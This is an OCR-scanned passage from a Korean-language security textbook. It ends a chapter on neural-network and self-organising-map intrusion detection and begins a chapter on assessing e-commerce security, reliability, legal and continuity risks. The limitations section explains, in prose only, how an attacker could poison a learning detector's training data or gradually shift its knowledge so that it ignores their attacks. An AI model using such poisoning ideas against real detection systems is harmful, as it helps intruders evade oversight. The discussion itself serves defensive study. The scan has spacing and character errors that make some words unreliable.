류한다면 침 입탐지능력 이 떨 어 질 수도 있 다. 회 로망의 파케 트는 오직 하나의 흔적 에 만 
속하지 만 더 많은 정 보가 입 수될 때 까지 는 여 러개의 흔적 에 속할수도 있다. SOM 의 확장 
은 사영 이 주어 진 파케트의 복사본을 여 러개의 무리 에 배 치 하게 한다. SOM 은 하나의 
파케 트를 여 러개의 흔적 에 맞추어 어 느것 이 최적일 치 인가를 판별해 볼수 있는 가능성 을 
가진 다. 이 로부터 흔적구성 도식 에 고장허 용준위 가 도입 된 다. 
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난점과 제한성 


이 개념체계의 구성을 론의하면서 침입탐지와 관련한 우점을 언급하였다. 그러나 이 
수법에 약점 이 없지는 않다. 

잘못된 학습 

신경회로망은 학습하는 동안에 상당한 정도로 공개된다. 신경회로망이 학습을 통하 
여 공격 과 허 용된 행 동을 구별 할 때 공격 자는 신경 회 로망을 통하여 어 떤 뒤문 (back door ) 
을 구축할 기회를 얻게 된다. 신경회로망은 공격과 허용된 활동에 대하여 다 훈련된다는 
것 을 상기하자. 만일 공격 과 갈은 행 동에 대 하여 구체 적 으로 기 발신호를 설정하지 않는 
다면 체 계는 그 활동을 허 용된 활동으로 인식하게 하는 어 떤 내부지식구조를 생성할것 이 
다. SYN 범람규칙에 대한 HTTP 례외는 좋은 실례이다. 신경회로망은 《만일 내가 흔적에 
서 일정한 특성 들을 발견한다면 그것은 공격 인데 그것 이 포구 80/ TCP 에 대 한것 이 아니 
라면 그것은 공격 이 아니 다》라고 학습한다. 신경회 로망은 허용된 HTTP 접속들에 훈련자 
료가 삽입되였기때문에 그 례외를 학습하였다. 만일 공격자가 SYN 범람공격을 자기의 회 
로망으로부터 훈련자료에 은밀히 삽입할수 있다면 회 로망은 또 다른 례외를 학습할수 있 
다. 회 로망은 이 번에는 《 만일 내 가 흔적 에서 일정한 특성들을 발견하였는데 그것 이 홈 
페지 attacker . net 로부터 온것 이 아니 라면 그것은 공격 이 다.》라고 학습한다. 공격 자는 훈 
련자료를 부식시켜 신경회 로망이 자기의 공격을 알지 못하게 함으로써 칩입탐지체계를 
피한다. 

다음과 같은 철학적인 문제를 고찰하자. 신경망은 인간지능으로부터 령감을 이끌어 
내 므로 그 모형 의 제 한성 을 자기 의 체 계안에 끌어 넣 을 가능성 을 가진다. 례 를 들면 인 
간은 일정한 형 태의 감각입 력 에 대 하여서는 시 간이 지 남에 따라 반응하지 않게 될수 있 
다. 사람들은 주위세계에 관한 자기의 지식을 끊임없이 갱신한다. 만일 개념이 조금 변화 
된다면 사람들은 그 변화를 반영하도록 자기의 지식 을 갱 신한다. 그 작은 변화의 축적효 
과는 오랜 시간범위에서 보면 극적일수 있다. 텔레비존에서 방영되는 폭력프로에 대한 
무반응이 이에 대한 좋은 실례이다. 련속학습모형들은 시간이 지남에 따라 신경회로망의 
지식을 점 차적으로 변화시 킨다. 품을 들여 완성한 활동으로 공격 자는 이 개 념체계안에서 
의 지 식변화에 기 여할수 있으며 회 로망이 일정한 공격 을 알수 없게 할수 있다. 시 간이 
지남에 따라 공격자는 그 기술을 리용하여 체계에 파구를 낼수 있다. 이것은 수감자가 
숟가락으로 감옥안에서 땅굴을 파는것과 류사하다. 

신경회로망과학 

신경 회 로망의 련속학습모형에 는 그에 고유한 여 러 가지 난점 이 있 다. 련속학습회 로망 
들은 일정한 입 력 으로부터 그에 대 응하는 출력까지의 명 시적 인 사영을 학습한다는것 이 
알려 져 있다. 이것은 효과상으로는 기억과정이며 일반화능력을 해소한다. 그것을 막는 
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한가지 방법은 일단 일정한 성능수준에 도달되면 학습을 중지하는것이다. 또 하나의 방 
법은 체계에 충분한 잡음을 끌어 들여 기억과정을 막는것인데 회로망을 혼란시킬 정도로 
많이 끌어 들여서는 안된다. 끝으로 복잡한 특징들을 기억할수 있는 숨은층의 요소수를 
줄일수 있다. 이것은 회로망이 복잡한 특징들의 더 간결한 내부표현을 학습하도록 강요 
하는 계산상의 난관을 초래하며 회로망의 매개의 입력/출력결합에 대한 명시적인 사영을 
만들지 못하게 한다. 즉 좋기는 하되 지나치게 좋지는 않은 신경회로망이 필요하다. 

신경회로망학습에서의 수학적처리와 관련하여 그에 고유한 여러가지 난점들이 있다. 
복잡한 신경회로망은 흔히 학습속도가 느리다는 비평을 받는다. 훈련공간의 크기는 회로 
망의 크기보다 여러 자리수나 더 커야 한다. 이것은 견고한 회로망에 매우 많은 훈련표본 
들을 제시할것을 요구한다. 학습과정은 정의에 의하여 반복적인 과정이므로 학습은 느릴 
수 있다. 연구사들은 알고리듬이 자연스럽게 여러번 반복되여 좋은 학습방향에서 안착되 
게 하며 그 방향으로 빨리 전진하게 하는 가속수법을 개발하였다. 이것은 신경회로망의 
학습속도를 상당한 정도로 개선하기는 하였지만 학습과정은 여전히 느리다. 

그리고 학습알고리듬은 오차함수를 대역최소값이 아닌 여러개의 국부최소값중의 하 
나로 가게 하는 방향을 취함수 있다. 이것은 패런정합기를 부정확하게 하며 언제 그것이 
발생하는가 하는데 대한 판단은 직관적으로 리해할수 없다. 실천적으로 이런 일은 드물 
게 생긴다. 그것은 부분적으로는 대부분의 견고한 신경망에 존재하는 고차원무게공간에 
의하여 제공되는 자유도가 높다는데 기인된다. 그러나 이것은 알고 있어야 할 실지문제 
점 이 다. 

실제적가능성 

개 념-증명원형 ( prototype ) 이 실험 실로부터 상업 적 인 상품으로 얼 마나 잘 확대 되 는가 
하는것 은 아직 까지 명 백 치 않다. 신의 실 제 적 가능성 에 대 한 많은 론평 들은 인공지 능체 계 
들이 가동한다고 해도 체계의 가동을 유지하자면 전임를퓨터과학자가 있어야 한다고 주 
장하고 있다. 이 분야의 과학연구는 지난 10년내에 많이 발전하였고 많은것들이 상업적 
체계 에 응용되기 시 작하였다. AI 에 기초한 침입탐지 가 주류기술로 되는가 하는것은 두고 
보아야 할 일이다. 과학적으로는 그 전망이 크다는것이 론증되고 있으며 따라서 그것을 
비현실적인것으로 제쳐 놓는것은 현명하지 못할수도 있다. 그러나 인공지능은 만병통치 
약이 아니며 기술발전으로부터 끊임없이 제기되는 보안문제에 대하여 응당한 주의를 돌 
려 야 한다. 


결 론 


실천공동체로서의 인간의 실천적경험은 보안이 어려운 문제라는것을 여러번 시인 
하였다. 보안문제가 명백한 경우는 매우 드물며 거의 언제나 그 사이에는 넓은 회색스 
펙 트르(불명 확성 )가 있 다. 인간은 그 회 색그림 자속에 서 도 잘 처 리할수 있지 만 를퓨터 는 
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결정론적인 기계이며 그런 능력을 쉽게 갖추지는 못한다. 인공지능연구의 기본목적은 
콤퓨터로 하여금 현재는 인간에게 보다 적합한 주관적인 문제들을 더 잘 풀수 있게 하 
는것 이 다. 

침입 탐지가 그러한 과제의 하나이 다. 전통적 인 침입 람지수법들은 수자식계산례에 기 
초하고 있다. 그 수법들은 콤퓨터의 특이점 즉 객관적인 연산을 빠르고 정확하게 실행하 
는 특징을 리용한다. 그러 나 그 수법들은 고유한 제 한성을 가지 고 있다. 침 입 탐지는 모호 
하며 주관적인 과제 이다. 수자식콤퓨터를 리용할 때 어느것이 침입으로 되는가를 완전히 
정의하는것은 불가능하지는 않지만 어려운 일이다. 

이 장에서는 인간의 두뇌모방에 기초한 침입탐지수법，구체적으로는 자체구성사영 
( SOM ) 으로 알려 진 자료발견기술을 고찰하였다. SOM 은 입력공간의 파케트들을 침입을 
분석할수 있는 의미 있는 흔적들로 서로 상관시킨다. 신경회로망패턴정합기는 흔적들에 
침 입활동이 존재 하는가를 분석한다. 이 두 기 술은 인간의 사유를 모방한 방식 으로 침 입 
을 람지하는 개념체계에서 결합된다. 

이 장에 서 고찰된 개 념 체 계 들은 SYN 범 람실 례 를 통하여 관찰된것 처 럼 부의 허 위오유 
률과 정의 허위오유률을 명백 히 개선한다. 인간의 두뇌를 모방한 체 계들은 패 런정 합침 입 
람지기로서 전망이 기대된다. 아마도 AI 에 관한 연구가 심화됨에 따라 지능적인 침입분 
석체계는 실험실단계를 벗어나 침입분석체계의 주류로 이행하게 될것이다. 
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제 3 7 장. 전자상업거래환경의 검토 


층리스 해어 


인터네트접근의 침투와 일부 상점을 통한 거래가 직결실행에로 이행함에 따라 전자 
상업거래분야에서 안정성 및 보안에 대한 요구는 점점 높아 지고 있다. 많은 성공적 인 전 
자상업거래싸이트중의 하나인 E * Trade 는 자기의 직결방식에 완전히 의존하여 기업을 유지 
한다. 목적 과 무관계한 지 출은 잠재 적 으로 수백 만딸라의 손해 를 줄수 있 다. 례 를 들어 
20()1 년 초에 있은 Yahoo 와 CNN 에 대한 분산형 봉사거부 ( DDoS ) 공격을 고찰하자. 그 공격 
을 저지시키는 방법이 일단 발견되기는 하였지만 수익손실외에도 체계를 재정비하는데 
수천딸라가 소비되였다. 이 론문은 전자상업거래의 보안 및 신뢰성을 평가하는 방법을 설 
명 한다. 위험평 가 (risk assessment ) 와 관련된 저 자의 경험 에 의 하면 보안，신뢰성 그리 고 
Web 감각 즉 사용상의 편리 성 은 전자상업 거 래의 지속적 인 성 공을 위하여 관건적 인것 으로 
인정될수 있다. 여기서 설명하는 수법들은 임의의 전자상업거래 Web 싸이트소유자，관리자 
혹은 재정검사원들이 기본위험령 역의 일부를 식 별하고 보안하는데 도움이 될수 있다. 

전자상업거래의 하부구조를 조종할수 있는가 

전자상업거래환경을 개발하고 실현하는데서 가장 중요한 난점은 그 환경전체를 고착 
시키는것이다. 성공은 목적한 결과를 달성하기 위하여 공정과 기술，실현을 밀접히 결합 
시키는데 의존한다. 최종목표의 달성은 종합적 인 전략，법적문제들과 수출문제 에 관한 리 
해，리용하고 있는 공정들은 물론 리용하는 기술에도 의존한다. 생각해 본후에가 아니라 
우선적으로 신뢰성과 무결성 그리고 리용성 있는 환경을 구상해 야 한다. 


전 략 


기 술의 파동과 문제 처 리방법 들에 사로잡히 지 말아야 한다. 기 술은 전체 적 인 난문제 
의 한 부분일뿐이다. 인간은 이미 수동적으로 운영되는 공정을 보충하여 더 넓은 시장을 
개 척 하기 위 하여 기술을 도입한다. 운영 형 편에 따라 기술적요구가 제 기되며 또 그것은 
필요한 체계의 총체적인 개발에 영향을 미친다. 계획의 실현도 흔히 기술에서의 변화보 
다도 오히 려 기 업의 변화와 법 률상요구의 변화에 의한 영 향을 더 받는다. 

전략은 효률적인 전자상업거래실현의 기본열쇠이다. 한 회사에 종사하는 사람들은 
자기 들의 계 획 화활동과 개 발활동을 전개하는데 리 용할수 있는 식 견이 있 어 야 한다. 그 
식견은 상급경영자들이 내세우고 있고 또한 성공을 계 량하는 기초로 되는 목표를 판단하 
게 한다. 전략이 없다면 회사자체와 회사의 직원들，회사주주들 그리고 소비자들이 회사 
가 무엇 을 달성했는가를 판단할수 없게 될 것 이 다. 

전략은 또한 회사가 작성하는 기업결정서에 기초하여야 한다. 소비자가 봉사를 받는 


556 









이 질문들에 대한 완벽하고 철저한 해답이 나와야 비로소 그것을 실현하는 기술적해 
결책을 찾을수 있게 된다. 그림 37 — 1 에 보여 준것처럼 기술적인 해결책은 복잡하며 많 
은 요소들을 포함한다. 기술실현과 관련한 개별적인 요소들을 선정하기전에 먼저 기업공 
정 들에 서 매 개 요소들의 호상작용을 리해하여 야 한다. 

법률상 문 제 


대부분의 회사들에 있어서 그것들이 상주하고 있는 나라나 거래를 가지고 있는 나라 
들의 법 을 정 확히 지키 는것 도 난문제의 하나이 다. 법 의 종류에 는 지 역법，주법，국가법， 
국제 법 등이 있다. 추가적 인 규정블은 업 계별로도 있고 공개매매 된 회 사인 경우에 도 추 
가적 인 규정 들이 있 다. 그러 나 전자적 방법 으로 기 업 을 운영 하는 경 우 새 로운 난문제 들이 
제기된다. 


사적 비 밀 


소비 자들은 자기정 보의 사적비 밀보장에 관심 을 가지 며 한편 회 사들은 소비 자들이 회 
사에 제공하거나 혹은 회사가 그들과 공유하고 있는 정보의 사적비밀을 보장하는데 관심 
을 가진다. 정보의 사적비밀보장과 관련한 세계의 각이한 지역에서의 법률적요구를 제쳐 
놓고 본다면 기업이 사적비밀을 통제하지 못한다면 신용기업으로 되지 못할것이다. 만일 
소비 자들이 회 사가 그것 을 고려하지 않는다는것 을 안다면 그들은 회 사와 전자거 래 를 하 
지 않을것이다. 

사적 비밀 문제 는 회 사나 기 관에 몇 가지 실질적 인 난문제 를 제 기한다. 례 를 들어 1999 
년에 유럽동맹 (EU) 은 정보의 사적 비밀과 보호에 관한 규범을 발효시켰다. EU 는 류사한 
사적 비 밀 보장규범 을 실 행 하지 않는 회 사나 나라들과는 거 래 하지 않을것 이 라고 발표하였 
다. 그러므로 매 회 사는 자기의 사적비밀보장방책 을 구체 적 으로 발표하여 야 한다. 이것은 
소비 자의 정보보호에 관한 기관측의 공약이 필요하다는것을 말해 준다. 

사적 비밀 문제 를 해 결 한다는것 은 그것 을 기 술적 으로 실 현하는 사람들이 암호，수자식 
서명 (digital signature) 그리고 수자식 인증서 (digkal certificate) 와 같은 단어들을 사용한다는 
것을 의미한다. 이것들은 사적비밀에 리용되는 기술적인 요소들이며 사용자들이 전자업 
무싸이 트를 통하여 받거 나 보내 는 정 보를 더 잘 보호할 수 있게 한다. 

그림 37_2 에 보여 준것처럼 Mastercard 사와 VISA 사가 안전전자업무처리 (SET) 규약을 
개 발하게 된것 은 소비 자의 상품구입관습정 보에 관한 사적비 밀 보장문제 와 관련된 다. 

모든 업무처 리(仕 ansaction) 는 정 보전송이 나 비 법 접근에 의 하여 중요한 기 업정 보가 손 
실되 지 않도록 안전하게 진행 되 여 야 한다. 이 런것 들을 잘 타산하여 전 략에 반영해 야 한 
다. 그렇 게 하여 야 불완전하게 실 현된 공정 이 나 기 술에 의한 정 보손실 과 성 능의 감소 혹 
은 신뢰성의 위험을 완화시킬수 있다. 
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수출통제 


수출통제는 정부에 의하여 진행되며 위험하거나 국가적리익에 맞지 않는 나라들에로 
의 수출은 제한된다. 대부분의 나라들이 이런 방식을 적용하고 있으며 암호기술과 같은 
일부 경우에는 그 항목의 수입을 막는 나라들이 있다. 

수출통제법을 잘 지킬것을 강력히 충고한다. 그것을 어긴 경우에 대한 처벌은 나라 
나 수출항목에 따라 매우 엄격할수 있다. 최근년간 (구체적으로는 암호를 포함한) 일부 
수출규정 들이 변화되 였다. 나라들마다 자기의 생산업체 들의 세계시장경쟁 력을 높이기 위 
한 노력의 일환으로 암호수입/수출규정들을 고치 고 있다. 

전자상업거래의 하부구조를 구축할 때에는 수입/수출법을 검토하는것이 중요하다. 그 
규정들이 적용되는 정보나 기술이 있을수 있고 그것은 봉사와 생산품을 받는 사람들에게 
영향을 미칠수도 있다. 


법 률 


많은 회사들에 있어서 법작성은 주요한 분야이다. 법률에는 사적비밀보장문제를 어 
떻게 처리하며 기업을 일반적으로 어떻게 운영하는가를 통제하는 다양한 법률이 있다. 
그 법률의 많은것들은 전자기업에만 국한되지 않는다. 인터네트망과 인터네트규정은 지 
적 소유권으로부터 싸이 버 정 착 ( cyber - squatting : 돈벌 이 를 목적 으로 URL 을 미 리 등록하는 
것)에 이르기까지 모든것에 해당된다. 

제기되는 문제가 다양하고 법조항이 복잡하므로 자격 있는 변호사의 도움을 받을것 
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을 권고한다. 변호사의 도움으로 전자기업을 활성화하는 능력에 대한 법의 영향을 세심 
하게 고려 하여 야 한다. 

법의 다양성을 고려할 때 관심을 두어야 할 일부 문제들을 보면 다음과 갈다. 

• 전자상업거래에 적용할수 있는 국가법과 국제법에는 어떤것들이 있는가. 

• 법률준수는 어떻게 담보되는가. 

• 어떤 나라들에서 기업들이 전자상업거래를 할수 없게 금지되는가. 

• 전자적으로 효력이 발생될수 있는 상품공급관련협정과 계약들이 있는가. 

• 기업이 수자식서명을 지원하는가 그리고 그것들이 기업관할권내에서 법적구속력 
을 가지게 되는가. 

• 국내 및 국제적으로의견상이를어떻게 해결하는가. 

• 전자상업거래의 하부구조를 통하여 리용하기전에 수출허가를 요구하는 기술이나 
정보가 있는가. 


개발과제관리 

전략이 규정되면 회사림은 뒤이어 관리활동을 규정하며 하부구조를 실제적으로 개발 
하고 실 현한다. 그러 나 개 발과제 관리 (project management ) 는 모든 사람들이 하여 야 할 일 
과 그 일정계획 그리고 예산량을 알도록 하는 방향으로 지향된다. 

회사림 이 개 발과제관리 가 없 이 전자상업 거 래봉사를 실현하게 한다면 많은 실수를 범 
할수 있다. 개발과제가 어디에 있는가를 판단하기는 어렵지만 그 개발과제가 언제 완수 
되며 그 개발과제에 얼마만한 액수가 지출되는가를 판단하기는 더욱 어렵다. 

개발과제관리는 개발과제를 규정하고 그 계획이 기업의 요구조건을 만족시킨다는것 
을 담보하며 예산의 초과지출이 없이 제때에 완수되도록 필요한 통제기능들을 제공한다. 
개 발과제관리전략은 그 개 발과제 를 완수하는데 필요한 과제 들을 규정하는데서 관건적 이 
다. 개발과제계획은 누가 그 개발과제와 그와 관련되는 부분개발과제들의 주최인가 그 
리고 사용자들이 전자상업거래실현설비의 정의，개발 및 검사에 어떻게 참가하는가를 
규정 한다. 

개 발과제관리 자는 그 개발과제의 분담구조를 규정 하고 그 개발과제의 진척정도를 측 
정 하는 리정 표를 설정한다. 개 발과제관리 자는 책 임 분담을 하며 비 용예 산과 자원예산을 
관리 한다. 

효률적인 개발과제관리가 없으면 전자상업거래계획은 기업의 요구를 만족시키지 못 
하는 값비싸면서도 결과가 없는 시도로 될수 있다. 

개 발과제 를 계 획 하고 그것 을 철저 히 실행하는 능력 이 있 어 야 정 확한 원가통제 와 계 
획화결정이 가능하다. 

고려할 사항은 다음과 같다. 
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• 개발과제계획이 측정할수 있는 형태로 최종목표를 정확히 규정하는가. 

• 개발과제를 제때에 그리고 계획외의 자원지출이 없이 실행할수 있는 충분한 인 
적자원과 기타 자원들이 준비되여 있는가. 

• 표준적 인 개발과제관리검토가 진행되였는가. 

• 개발과제지출이 어떻게 장악되는가. 

• 실행 및 재정적인 측면에서 개발과제가 자기 궤도에 있는가. 

미 으서 
= a o 


전자상업거래의 하부구조는 소비자가 그것을 리용하고 싶을 때마다 리용할수 있어야 
하며(리용성) 소비자가 바라는대로 동작하여야 한다(무결성). 대부분의 사람들이 인식하 
고 있지는 못하지만 신뢰성은 보안과 관련되는 기본요소이다. 소비자들은 상품을 전자상 
업거래를 통하여 살 때 자기들이 거래하려는 상인의 상품명세를 펼쳐 보고 주문상품을 
입력하며 임의의 거래도 철저히 마무리되기를 바란다. 그리고 판매자가 자기들의 주문상 
품이 해당 시간에 도착하도록 체계구성부분들을 다 동작시키고 있을것이라는 확신을 가 
지고 싶어 한다. 

그런데 일이 잘못되면 어떤 일이 생기겠는가. 소비자들은 상인에게 충고를 하고 그 
해결책을 찾을수 있도록 판매자와 접촉하는 방법을 요구한다. 그러나 신뢰성은 이런 문 
제가 해결되는것이상으로 포괄범위가 크다. 신뢰성에는 회사나 기관이 현재 혹은 앞으로 
문제가 있을수도 있다는것을 아는 능력까지 포함된다. 체계의 성능은 어떻게 평가되는가， 
봉사제공자들중의 한 사람에게 책임이 있는 문제는 어떻게 해결하는가. 

성능 

체계가 신뢰성 있고 친절하며 가치 있는 경험자료를 제공하는 능력은 본질적이다. 
사용자들은 봉사내용，봉사에로의 접근 그리고 자기들이 요구하는것을 빨리 찾는것 등에 
대하여 큰 기대를 가지고 있다. 사용자의 관점에서 성능은 정보가 화면에 현시되는데 걸 
리는 시간으로 측정된다. 동화상과 보기 좋은 그라픽스가 많은 회 려한 Web 싸이트는 일 
단 완전히 내 리적재되 면 눈길을 끌수도 있지 만 그 판매 자의 화려한 홈페 지 가 내 리적재시 
간이 무한정 걸리면 대부분의 사용자들은 실망하며 다시는 보려고 하지 않는다. 최소능 
력을 가진 체계에 맞추어 개발하면 다른 모든 체계들도 그 폐지에 다 접근할수 있을것이 
다. 

성능에 대한 소비자의 견해는 상인의 인터네트접근의 능력계획화와 소비자들에게 봉 
사를 제공하는 봉사기들에 따라 달라 질수 있다. 상인측이 소비자들이 바라는 실제 성능 
준위를 보장하지 못하면 결국에는 그 상인자신이 피해를 당한다. 망과 봉사기성능에 관 
한 능력계획화는 얼마나 많은 사용자들이 그 싸이트에 접근하게 하겠는가에 따라 강화될 
수 있다. 
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리유가 어떻든 성능문제를 빨리 해결할수 있는 계획을 작성하는것은 소비자수요를 
사전에 예견하는데서 매우 중요하다. 이렇게 되면 림에 대한 능력계획화전문지식을 가지 
는것으로 된다. 전문가들은 매일매일 성능을 감시하여 싸이트를 리용할수 있는 소비자들 
의 수를 최대화하고 래일에는 증가된 사용자들을 처리할수 있는 충분한 능력이 있도록 
한다. 

구성구조 

신뢰성고찰에서 두번째 요소는 총체적으로 체계 및 망구성구조와 관계된다. 소비자 
들에 게 봉사할 때 어떤 체 계들이 개 입 하며 그 체 계들이 봉사제 공에서 어떻 게 호상작용하 
는가를 리해하는것 이 중요하다. 능력계획작성 자들이 중요한것처럼 시장에 파악 있는 전 
자상업거래설계가가 매우 중요하다. 회사전반을 보호하는 보안구조와 그 실현방법을 알 
고 있는 보안전문가들도 역시 중요하다. 

성능측정 

능력계획화와 소비 자만족 그리고 사용법과 관련한 계 측값수집도 필수적 이 다. 운영통 
계 자료수집은 기 업운영의 부분으로 되며 기술사용중단시 간과 용도와 갈은 항목들을 포함 
한다. 운영통계자료들은 일반적으로 제기되는 문제에 관한 정보를 제공하는데 리용되며 
정 확한 운영문제들에 노력을 집중해 야 할곳을 판단하는데 도움이 된다. 문의소 (help desk ) 
봉사나 소비 자봉사분야는 이 종류의 계 측값을 기 록하는데는 무의 미하다. 

운영 통계 자료가 다 수집 되 면 분석 되 고 운영 상태보고서 를 작성할수 있도록 계 측값으 
로 정리되여야 한다. 전자상업거래환경이 어떻게 동작하고 있는가，얼마나 많은 소비자들 
이 싸이 트를 리용하였는가，지 출은 얼마이 며 무엇 이 판매되 였는가. 그러 나 계 측값들은 기 
관전반에 걸쳐 종합되여 기관이 어떻게 일을 처리하고 있으며 소비자들이 무엇에 관심이 
있는가를 최 고경 영 진으로 하여 금 판단하도록 전략적 지표들을 설정할수 있게 한다. 그 
관계를 그림 37 — 3에 보여 주었다. 



그림 37-3. 운영 통계자료로부터 전략지 표에 로의 이 행 과정 
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운영통계자료와 계측값들에 대하여 고려해야 할 사항들에는 다음과 갈은것들이 포함 
된마. 

• 리용할수 있는 계측값을 수집，보고，확증하기 위하여 어떤 노력을 하고 있는가. 

• 내부 및 외부봉사제공자들로부터 어떤 계측값을 받을수 있는가. 

• 그 계측값들에 대 한 보고서구조결정 

• 그 계측값들의 리용방법결정 

• 체계를 개선하거 나 문제 점 들을 시 정 하기 위 하여 어떤 공정 에서 그 계 측값들을 
되돌려 리용하는가. 

문제해결 

전자상업거 래싸이 트의 기 본사용자는 소비 자들이 다. 그러 나 때 로는 일 이 잘못되거 나 
소비자들이 그 싸이트를 리용하는 과정에 문제가 생길수 있으며 그 문제에 관하여 누구 
와 상담하고 싶은 경우가 있다. 결국 소비자들은 그 문제들을 통지하거나 그 대답을 요 
구할수 있는 장소를 필요로 한다. 

이것은 그 Web 싸이트에 관한 문제보고서가 작성되고 그 해결을 위하여 정 확한 지원 
그룹에 제출되는 쎈터 혹은 제품에 대한 질문을 하면 그에 대한 대답이 제공되는 소비자 
문의쎈터의 설립을 요구 한다. 그 쎈터를 효률적으로 운영하자면 소비자의 문제와 그에 
대한 해결책을 제공하기 위하여 무엇이 진행되였는가 하는 리력을 추적할수 있는 문의추 
적체계를 리용하여야 한다. 

만일 세계적인 회사를 운영한다면 (만일 회사가 전자상업거래싸이트를 가지고 있다 
면 소비자들은 세계적인 소비자로 될것이다) 사람들이 세계의 임의의곳에서 실시간적으 
로 회사에 접근할수 있는 방법을 찾아야 할 필요가 있다. 

소비 자문의쎈터 는 소비 자의 요구에 빨리 응하여 그들이 긴급하게 요구하는 정 보를 
제공할수 있어 야 한다. 그래야 소비자들이 그 능력에 대하여 확신을 가지며 자기들의 구 
매경험을 보충할수 있다. 

문의팬터를 고찰할 때 다음의 질문들이 고려되여야 한다. 

• 소비자와 회사가 만족준위를 어떻게 평가하는가. 

• 일단 통지를 밤으면 문제를 해결하는데 얼마만한 시간이 걸리는가，소비자가 그 
해결책에 대하여 만족하는가，후속대책이 필요한가. 

• 통지해 온 문제 에 서 공통적 인 문제 가 무엇 이 며 그것 들을 수정 하기 위하여 무엇 
이 진행되였는가. 

• 어떠한 문제추적 및 해결체계가 리용되고 있는가. 

• 계측값들을 엄을수 있고 추세를 파악할수 있게 문제들이 기록되였는가. 
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봉사준우 I 협약 


봉사준위협 약 ( SLA ) 은 운영예 상성 능과 문제확대 및 해 결을 포함한 봉사조건 들을 규 
정한다. 전자상업거래활동에서는 운영예상성능과 문제확대 및 해결이 중요하다. 성능이 
좋지 않다는것 은 전자상업 거 래봉사를 소비 자가 리용할수 없다는것 을 의 미하므로 제 공된 
봉사의 운영성능은 관건적인 요소로 된다. 이것은 다시 인터네트상에서의 회사의 최저신 
용기 준선 영 상에 부정 적 인 영 향을 미 칠 수 있 다. 

문제의 시기 적절한 해 결도 역시 갈은 리유로 하여 중요하다. 소비 자들은 제 기된 문제 
의 봉사준위시 간성 이 만족되 기 를 기 대한다. 봉사제공자들과는 어떤 협 약이 있으며 그 계 
약을 지키지 않을 때 처벌이 있는가. 

SLA 는 봉사제공자들의 능력을 평가하는데 도움이 되며 그 계 약을 갱신할 때도 쓸모 
가 있다. 성능 및 문제해결에 관한 좋은 정보를 수집하고 보관한다면 계약의 변화 그리 
고 봉사송달에서 좋거나 혹은 좋지 않은 성능에 기인되는 가격을 협상하는데서 더 성공 
할수 있 을것 이 다. 

전자상업거 래환경 을 위해 준비되 여 있는 SLA 를 검 토할 때 잊지 말하야 할 사항에 는 
다음의것 들이 포함된 다. 

• ISP 와 망제 공자들과 같은 제 공자들로부터 SLA 를 구입해 야 한다. 

• SLA 에는 어떤 봉사의 질조항들이 있는가，봉사제공자들이 그 협 약을 준수하고 
있는가. 

• 봉사제 공자들과 기 관이 그들의 사업능률에 대 한 기 록을 가지 고 있는가. 

기업유지 

체계고장，접속손실 혹은 기타 문제로부터 회복하는 하부구조의 능력은 본질적인것 
이 다. 상품판매 를 위한 주문도 유지 되 여 야 할 매우 중요한 활동이 다. 기관이 자기의 전자 
상업거래의 하부구조의 부분적인 혹은 완전한 손실을 어떻게 처리하는가，전자상업거래 
기 업 을 유지 하기 위 한 해 당한 계 획 이 준비 되 여 있 는가. 

기업지속성계획과 재해복구계획은 그 어느 기업에서나 중요한 문제로 되지만 치명적 
인 체계고장후에 기업운영을 유지하는데서도 중요하다. 례를 들면 여러 체계들이 갑자기 
고장날 때 전자상업 거 래운영 이 유지 될 수 있 는가. 

이것은 후원기관에 물어 보아야 할 중요한 질문이다. 만일 기관이 전자상업거래환경 
의 앞으로의 운영에 크게 의존한다면 짧은 시간동안의 고장도 기업에 재난적인 영향을 
미칠수 있다. 만일 기 업운영 이 최 저통화량 (foot traffic ) 에 보다 더 의거 하고 있다면 기 업운 
영 정 지 시 간 (down time ) 의 여 유가 있 을수 있 다. 

그러 나 오늘날의 정 보시 대 에 직 결 기 업 (online business ) 이 비직 결 기 업 으로 된 다면 모 
두가 그 소문을 매우 빨리 알게 될것 이 다. 

기업지속성에 관하여 관심을 두어야 할 사항들은 다음과 같다. 
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• 전자상업거래가 기관의 생존에 얼마나 중요한가를 결정하기 위한 업무영향분석 
이 진행되였는가. 

• Web 봉사기와 기 타 체계들이 비상사태계 획의 전자상업거 래송달부분에 포함되 여 
있는가. 

• 예 비복사절 차，신뢰성 있는 예 비본들 그리 고 정규적 인 자료 및 체계회복검사가 
있는가. 

• 체계상태감시자가 무결성과 운영을 유지하게끔 되여 있는가. 

개 발 


이 미 앞에서 언급한것 처 럼 소비 자들은 전자상업거 래체 계 가 자기들을 위하여 어떻게 
동작하는가에 대한 경험을 기억하고 있을것이다. 그러므로 일관성 있는 대면부를 개발하 
는것이 필요하며 그것은 충분한 개발실천을 통하여 달성될수 있다. 

표준과 관례 

소비 자들이 전자상업거래싸이트리 용에서 긍정적 인 경험을 가지 도록 하는 기 본방법은 
개발표준과 관례를 수립하는것이다. 이것은 소비자들의 거래경험에서 쌓은 감각과는 다 
르 다. 

싸이트개발자들은 응용프로그람들이 어떻게 개발되는가에 대한 정보와 방법을 제공 
하기 위하여 표준과 관례를 리용한다. 여기에는 코드표준과 보안 그리고 소비자로부터 
제출된 정보가 어떻게 확인되고 보호되는가 하는것과 같은 문제들이 포함된다. 따라서 
보안은 후에 생 각나서 응용프로그람에 포함되 는것 이 아니 라 처 음부터 응용프로그람에 서 
고려될 필요가 있다. 

개발자들은 자기들의 경험과 교육에 기초하여 체계의 구체적인 부분을 어떻게 개발 
하고 작성할것 인가에 대한 결심을 채택한다. 여 기서 잘못하면 계속적 인 유지와 뒤따르는 
고장퇴치 및 문제해결이 어렵게 된다. 

변경조종과 변경관리 

변경조종 (change control ) 은 전체 개발/생산주기에서 관건적인 부분이다. 적절한 변경 
조종은 생산에 도입된 불철저하게 검사된 응용프로그람의 위험을 감소시킨다. 변경조종 
은 또한 매 일매 일의 변경 으로부터 응용프로그람코드에서의 변경 까지 식 별하는데도 쓰이 
며 적절한 문제해결과 개발자교육을 가능하게 한다. 

응용프로그람 코드의 개 발과 관련한 기본문제는 그것 이 흔히 생산체계 에 삽입되며 소 
비자들이 그것을 리용하는 동안에 《수정》된다는 사실이다. 이 형태의 활동은 체계의 
개발에 영향을 줄뿐아니라 전자상업거래싸이트에 대한 사용자의 인식과 기업의 직결존재 
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에 도 영 향을 준다. 

정확한 변경조종은 개 발코드가 개 발환경에서 검사되고 소비자가 제공하는 정확한 정 
보만이 아니라 고의적인 혹은 우연적인 입력에서의 처리오차를 처리하게끔 한다. 

Web 싸이트에 수집된 정보의 정확한 처리는 기업운영에 영향을 미친다. 정보를 정확 
